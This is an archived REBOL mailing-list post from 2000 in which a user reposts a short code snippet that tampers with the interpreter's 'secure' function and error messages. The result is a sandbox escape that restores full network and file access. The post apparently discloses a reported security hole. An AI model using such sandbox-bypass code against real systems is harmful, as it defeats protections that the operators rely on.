Mailing List Archive: 49091 messages
  • Home
  • Script library
  • AltME Archive
  • Mailing list
  • Articles Index
  • Site search
 

[REBOL] A small security hole REBOL, and a huge one! Re:(3)

From: lmecir:geocities at: 21-Aug-2000 16:17

Hi, the following code was posted by me some time ago and the principle was sent to feedback too. Here it is again: protect 'secure system/error/script/type: "" system/error/script/expect-arg: [ ( change pick third :secure 3 reduce [word! block!] secure allow "I love you" ) ] change pick third :secure 3 reduce [unset! none!] ; the results are:
>> secure throw
** : I love you. ** Where: secure throw
>> secure []
== [net allow file allow] Regards Ladislav ----- Puvodní zpráva ----- Od: <[ptretter--charter--net]> Komu: <[list--rebol--com]> Odesláno: 21. srpna 2000 0:59 Predmet: [REBOL] A small security hole REBOL, and a huge one! Re:(2)